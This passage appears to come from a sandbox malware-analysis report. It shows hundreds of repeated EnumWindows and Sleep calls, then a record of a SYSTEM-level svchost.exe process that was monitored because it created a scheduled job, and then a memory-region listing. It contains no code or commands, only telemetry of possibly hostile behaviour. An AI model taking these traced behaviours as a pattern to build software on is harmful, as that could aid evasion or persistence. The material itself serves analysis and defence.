(lpEnumFunc=0x2843dc0, lParam=0x2830000) [0316.762] Sleep (dwMilliseconds=0x64) [0316.846] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0316.846] Sleep (dwMilliseconds=0x64) [0316.873] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0316.874] Sleep (dwMilliseconds=0x64) [0316.913] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0316.914] Sleep (dwMilliseconds=0x64) [0316.955] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0316.956] Sleep (dwMilliseconds=0x64) [0316.971] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0316.972] Sleep (dwMilliseconds=0x64) [0316.984] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0316.985] Sleep (dwMilliseconds=0x64) [0317.008] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0317.009] Sleep (dwMilliseconds=0x64) [0317.046] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0317.047] Sleep (dwMilliseconds=0x64) [0317.103] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0317.104] Sleep (dwMilliseconds=0x64) [0317.118] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0317.118] Sleep (dwMilliseconds=0x64) [0317.143] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0317.144] Sleep (dwMilliseconds=0x64) [0317.182] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0317.183] Sleep (dwMilliseconds=0x64) [0317.221] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0317.222] Sleep (dwMilliseconds=0x64) [0317.229] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0317.230] Sleep (dwMilliseconds=0x64) [0317.265] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0317.267] Sleep (dwMilliseconds=0x64) [0317.306] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0317.307] Sleep (dwMilliseconds=0x64) [0317.332] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0317.332] Sleep (dwMilliseconds=0x64) [0317.347] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0317.348] Sleep (dwMilliseconds=0x64) [0317.386] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0317.386] Sleep (dwMilliseconds=0x64) [0317.421] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0317.421] Sleep (dwMilliseconds=0x64) [0317.426] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0317.426] Sleep (dwMilliseconds=0x64) [0317.472] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0317.473] Sleep (dwMilliseconds=0x64) [0317.515] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0317.516] Sleep (dwMilliseconds=0x64) [0317.532] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0317.533] Sleep (dwMilliseconds=0x64) [0317.558] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0317.558] Sleep (dwMilliseconds=0x64) [0317.597] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0317.635] Sleep (dwMilliseconds=0x64) [0317.650] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0317.650] Sleep (dwMilliseconds=0x64) [0317.679] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0317.679] Sleep (dwMilliseconds=0x64) [0317.716] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0317.717] Sleep (dwMilliseconds=0x64) [0317.755] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0317.756] Sleep (dwMilliseconds=0x64) [0317.768] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0317.768] Sleep (dwMilliseconds=0x64) [0317.847] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0317.848] Sleep (dwMilliseconds=0x64) [0317.887] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0317.888] Sleep (dwMilliseconds=0x64) [0317.911] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0317.912] Sleep (dwMilliseconds=0x64) [0317.926] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0317.926] Sleep (dwMilliseconds=0x64) [0317.964] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0317.965] Sleep (dwMilliseconds=0x64) [0318.001] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0318.001] Sleep (dwMilliseconds=0x64) [0318.004] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0318.004] Sleep (dwMilliseconds=0x64) [0318.051] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0318.052] Sleep (dwMilliseconds=0x64) [0318.132] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0318.133] Sleep (dwMilliseconds=0x64) [0318.148] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0318.149] Sleep (dwMilliseconds=0x64) [0318.178] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0318.179] Sleep (dwMilliseconds=0x64) [0318.219] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0318.220] Sleep (dwMilliseconds=0x64) [0318.300] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0318.307] Sleep (dwMilliseconds=0x64) [0318.327] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0318.328] Sleep (dwMilliseconds=0x64) [0318.366] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0318.367] Sleep (dwMilliseconds=0x64) [0318.409] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0318.410] Sleep (dwMilliseconds=0x64) [0318.449] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0318.450] Sleep (dwMilliseconds=0x64) [0318.452] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0318.452] Sleep (dwMilliseconds=0x64) [0318.494] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0318.497] Sleep (dwMilliseconds=0x64) [0318.540] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0318.541] Sleep (dwMilliseconds=0x64) [0318.564] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0318.564] Sleep (dwMilliseconds=0x64) [0318.589] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0318.590] Sleep (dwMilliseconds=0x64) [0318.640] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0318.641] Sleep (dwMilliseconds=0x64) [0318.687] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0318.687] Sleep (dwMilliseconds=0x64) [0318.710] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0318.711] Sleep (dwMilliseconds=0x64) [0318.736] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0318.736] Sleep (dwMilliseconds=0x64) [0318.945] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0318.949] Sleep (dwMilliseconds=0x64) [0319.050] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0319.051] Sleep (dwMilliseconds=0x64) [0319.092] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0319.095] Sleep (dwMilliseconds=0x64) [0319.135] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0319.135] Sleep (dwMilliseconds=0x64) [0319.186] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0319.187] Sleep (dwMilliseconds=0x64) [0319.210] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0319.211] Sleep (dwMilliseconds=0x64) [0319.232] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0319.233] Sleep (dwMilliseconds=0x64) [0319.275] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0319.276] Sleep (dwMilliseconds=0x64) [0319.338] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0319.338] Sleep (dwMilliseconds=0x64) [0319.357] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0319.358] Sleep (dwMilliseconds=0x64) [0319.391] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0319.392] Sleep (dwMilliseconds=0x64) [0319.429] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0319.430] Sleep (dwMilliseconds=0x64) [0319.456] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0319.457] Sleep (dwMilliseconds=0x64) [0319.468] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0319.469] Sleep (dwMilliseconds=0x64) [0319.510] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0319.511] Sleep (dwMilliseconds=0x64) [0319.550] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0319.550] Sleep (dwMilliseconds=0x64) [0319.569] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0319.571] Sleep (dwMilliseconds=0x64) [0319.614] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0319.614] Sleep (dwMilliseconds=0x64) [0319.651] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0319.652] Sleep (dwMilliseconds=0x64) [0319.683] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0319.683] Sleep (dwMilliseconds=0x64) [0319.693] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0319.694] Sleep (dwMilliseconds=0x64) [0319.747] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0319.748] Sleep (dwMilliseconds=0x64) [0319.916] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0319.917] Sleep (dwMilliseconds=0x64) [0319.925] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0319.925] Sleep (dwMilliseconds=0x64) [0319.997] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0319.998] Sleep (dwMilliseconds=0x64) [0320.037] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0320.037] Sleep (dwMilliseconds=0x64) [0320.054] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0320.054] Sleep (dwMilliseconds=0x64) [0320.094] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0320.094] Sleep (dwMilliseconds=0x64) [0320.133] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0320.134] Sleep (dwMilliseconds=0x64) [0320.179] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0320.180] Sleep (dwMilliseconds=0x64) [0320.189] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0320.190] Sleep (dwMilliseconds=0x64) [0320.229] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0320.229] Sleep (dwMilliseconds=0x64) [0320.269] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0320.270] Sleep (dwMilliseconds=0x64) [0320.289] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0320.289] Sleep (dwMilliseconds=0x64) [0320.311] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0320.312] Sleep (dwMilliseconds=0x64) [0320.352] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0320.440] Sleep (dwMilliseconds=0x64) [0320.494] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0320.494] Sleep (dwMilliseconds=0x64) [0320.498] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0320.499] Sleep (dwMilliseconds=0x64) [0320.538] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0320.539] Sleep (dwMilliseconds=0x64) [0320.577] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0320.577] Sleep (dwMilliseconds=0x64) [0320.585] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0320.586] Sleep (dwMilliseconds=0x64) [0320.616] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0320.617] Sleep (dwMilliseconds=0x64) [0320.654] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0320.655] Sleep (dwMilliseconds=0x64) [0320.690] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0320.690] Sleep (dwMilliseconds=0x64) [0320.694] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0320.695] Sleep (dwMilliseconds=0x64) [0320.733] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0320.734] Sleep (dwMilliseconds=0x64) [0320.773] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0320.775] Sleep (dwMilliseconds=0x64) [0320.878] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0320.880] Sleep (dwMilliseconds=0x64) [0320.925] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0320.926] Sleep (dwMilliseconds=0x64) [0320.932] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0320.932] Sleep (dwMilliseconds=0x64) [0320.968] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0320.970] Sleep (dwMilliseconds=0x64) [0321.007] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0321.008] Sleep (dwMilliseconds=0x64) [0321.037] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0321.038] Sleep (dwMilliseconds=0x64) [0321.047] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0321.047] Sleep (dwMilliseconds=0x64) [0321.090] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0321.093] Sleep (dwMilliseconds=0x64) [0321.172] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0321.173] Sleep (dwMilliseconds=0x64) [0321.176] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0321.176] Sleep (dwMilliseconds=0x64) [0321.211] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0321.212] Sleep (dwMilliseconds=0x64) [0321.249] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0321.250] Sleep (dwMilliseconds=0x64) [0321.274] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0321.275] Sleep (dwMilliseconds=0x64) [0321.293] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0321.293] Sleep (dwMilliseconds=0x64) [0321.331] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0321.332] Sleep (dwMilliseconds=0x64) [0321.370] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0321.370] Sleep (dwMilliseconds=0x64) [0321.392] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0321.393] Sleep (dwMilliseconds=0x64) [0321.419] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0321.419] Sleep (dwMilliseconds=0x64) [0321.456] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0321.457] Sleep (dwMilliseconds=0x64) [0321.498] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0321.499] Sleep (dwMilliseconds=0x64) [0321.506] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0321.507] Sleep (dwMilliseconds=0x64) [0321.546] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0321.547] Sleep (dwMilliseconds=0x64) [0321.589] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0321.590] Sleep (dwMilliseconds=0x64) [0321.626] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0321.627] Sleep (dwMilliseconds=0x64) [0321.633] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0321.633] Sleep (dwMilliseconds=0x64) [0321.668] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0321.669] Sleep (dwMilliseconds=0x64) [0321.709] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0321.710] Sleep (dwMilliseconds=0x64) [0321.748] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0321.748] Sleep (dwMilliseconds=0x64) [0321.757] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0321.758] Sleep (dwMilliseconds=0x64) Thread: id = 56 os_tid = 0xd54 Thread: id = 57 os_tid = 0x13d8 Thread: id = 58 os_tid = 0xbc4 Thread: id = 59 os_tid = 0xf30 Thread: id = 60 os_tid = 0x798 Thread: id = 61 os_tid = 0xd30 Thread: id = 62 os_tid = 0xca0 Thread: id = 149 os_tid = 0xe28 Process: id = "4" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x7369f000" os_pid = "0x60" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "created_scheduled_job" parent_id = "3" os_parent_pid = "0x218" cmd_line = "C:\\Windows\\system32\\svchost.exe -k netsvcs" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xe], "NT SERVICE\\BITS" [0xa], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\DcpSvc" [0xa], "NT SERVICE\\dmwappushservice" [0xa], "NT SERVICE\\DoSvc" [0xa], "NT SERVICE\\DsmSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xa], "NT SERVICE\\LanmanServer" [0xa], "NT SERVICE\\lfsvc" [0xa], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\NcaSvc" [0xa], "NT SERVICE\\NetSetupSvc" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\RetailDemo" [0xa], "NT SERVICE\\Schedule" [0xa], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xa], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xa], "NT SERVICE\\UsoSvc" [0xa], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xa], "NT SERVICE\\wlidsvc" [0xa], "NT SERVICE\\wuauserv" [0xa], "NT SERVICE\\XboxNetApiSvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000cdd2" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Region: id = 10088 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 10089 start_va = 0x20000 end_va = 0x21fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 10090 start_va = 0x30000 end_va = 0x44fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 10091 start_va = 0x50000 end_va = 0xcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 10092 start_va = 0xd0000 end_va = 0xd3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 10093 start_va = 0xe0000 end_va = 0xe0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 10094 start_va = 0xf0000 end_va = 0xf1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 10095 start_va = 0x100000 end_va = 0x1bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 10096 start_va = 0x1c0000 end_va = 0x1c0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 10097 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 10098 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 10099 start_va = 0x1f0000 end_va = 0x1f6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 10100 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 10101 start_va = 0x400000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 10102 start_va = 0x500000 end_va = 0x500fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "netmsg.dll" filename = "\\Windows\\System32\\netmsg.dll" (normalized: "c:\\windows\\system32\\netmsg.dll") Region: id = 10103 start_va = 0x510000 end_va = 0x510fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 10104 start_va = 0x520000 end_va = 0x520fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000520000" filename = "" Region: id = 10105 start_va = 0x540000 end_va = 0x541fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 10106 start_va = 0x550000 end_va = 0x551fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 10107 start_va = 0x560000 end_va = 0x561fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "dosvc.dll.mui" filename = "\\Windows\\System32\\en-US\\dosvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\dosvc.dll.mui") Region: id = 10108 start_va = 0x580000 end_va = 0x63ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10109 start_va = 0x640000 end_va = 0x640fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000640000" filename = "" Region: id = 10110 start_va = 0x650000 end_va = 0x650fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000650000" filename = "" Region: id = 10111 start_va = 0x660000 end_va = 0x666fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000660000" filename = "" Region: id = 10112 start_va = 0x670000 end_va = 0x670fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000670000" filename = "" Region: id = 10113 start_va = 0x680000 end_va = 0x680fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000680000" filename = "" Region: id = 10114 start_va = 0x690000 end_va = 0x690fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "usocore.dll.mui" filename = "\\Windows\\System32\\en-US\\usocore.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\usocore.dll.mui") Region: id = 10115 start_va = 0x6a0000 end_va = 0x6a1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006a0000" filename = "" Region: id = 10116 start_va = 0x6b0000 end_va = 0x6b1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006b0000" filename = "" Region: id = 10117 start_va = 0x6c0000 end_va = 0x6c3fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 10118 start_va = 0x6d0000 end_va = 0x6d3fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 10119 start_va = 0x700000 end_va = 0x706fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000700000" filename = "" Region: id = 10120 start_va = 0x710000 end_va = 0x78ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000710000" filename = "" Region: id = 10121 start_va = 0x7d0000 end_va = 0x7d6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007d0000" filename = "" Region: id = 10122 start_va = 0x800000 end_va = 0x8fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000800000" filename = "" Region: id = 10123 start_va = 0x900000 end_va = 0xa87fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000900000" filename = "" Region: id = 10124 start_va = 0xa90000 end_va = 0xc10fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a90000" filename = "" Region: id = 10125 start_va = 0xc20000 end_va = 0x101afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000c20000" filename = "" Region: id = 10126 start_va = 0x1020000 end_va = 0x109ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 10127 start_va = 0x10a0000 end_va = 0x10e4fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000005.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000005.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000005.db") Region: id = 10128 start_va = 0x1100000 end_va = 0x11fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001100000" filename = "" Region: id = 10129 start_va = 0x1200000 end_va = 0x12fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001200000" filename = "" Region: id = 10130 start_va = 0x1300000 end_va = 0x13fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001300000" filename = "" Region: id = 10131 start_va = 0x1400000 end_va = 0x14fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001400000" filename = "" Region: id = 10132 start_va = 0x1500000 end_va = 0x15fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001500000" filename = "" Region: id = 10133 start_va = 0x1600000 end_va = 0x16fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001600000" filename = "" Region: id = 10134 start_va = 0x1700000 end_va = 0x174efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001700000" filename = "" Region: id = 10135 start_va = 0x17e0000 end_va = 0x17e6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000017e0000" filename = "" Region: id = 10136 start_va = 0x1800000 end_va = 0x18fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001800000" filename = "" Region: id = 10137 start_va = 0x1900000 end_va = 0x19fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001900000" filename = "" Region: id = 10138 start_va = 0x1a00000 end_va = 0x1d36fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 10139 start_va = 0x1d40000 end_va = 0x1e3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001d40000" filename = "" Region: id = 10140 start_va = 0x1e40000 end_va = 0x1f1ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 10141 start_va = 0x1f40000 end_va = 0x203ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f40000" filename = "" Region: id = 10142 start_va = 0x2040000 end_va = 0x213ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002040000" filename = "" Region: id = 10143 start_va = 0x2140000 end_va = 0x21bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002140000" filename = "" Region: id = 10144 start_va = 0x2200000 end_va = 0x22fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002200000" filename = "" Region: id = 10145 start_va = 0x2300000 end_va = 0x23fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002300000" filename = "" Region: id = 10146 start_va = 0x2400000 end_va = 0x24fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002400000" filename = "" Region: id = 10147 start_va = 0x2500000 end_va = 0x25fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002500000" filename = "" Region: id = 10148 start_va = 0x2670000 end_va = 